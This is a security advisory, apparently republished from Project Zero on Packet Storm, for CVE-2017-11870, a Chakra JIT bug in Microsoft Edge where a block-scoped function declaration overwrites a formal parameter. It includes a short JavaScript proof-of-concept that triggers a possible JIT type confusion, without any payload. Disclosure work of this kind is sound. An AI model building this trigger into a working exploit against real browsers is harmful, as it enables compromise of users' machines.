Microsoft Edge Chakra JIT suffers from an incorrect function declaration scope.
747b70cd2c766255cc31286d6f576d8686314f74c6bb84aec68875dd42590077Microsoft Edge: Chakra: JIT: Incorrect function declaration scope
CVE-2017-11870
In the following JavaScript code, both of the print calls must print out "undefined" because of "x" is a formal parameter. But the second print call prints out "function x() { }". This bug may lead to type confusion in JITed code.
function f(x) {
print(x);
{
function x() {
}
}
print(x);
}
The following code in "PreVisitFunction" is used to decide how to optimize arguments.
bool doStackArgsOpt = (!pnode->sxFnc.HasAnyWriteToFormals() || funcInfo->GetIsStrictMode());
"HasAnyWriteToFormals" set by "Parser::BindPidRefsInScope" returns true in the following example code where "x" is formal. But the method can't detect the above buggy case, so it may end up wrongly optimizing arguments.
function f(x) {
x = 1;
}
PoC:
function f(x) {
arguments;
{
function x() {
}
}
}
for (let i = 0; i < 10000; i++)
f();
This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.
Found by: lokihardt
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed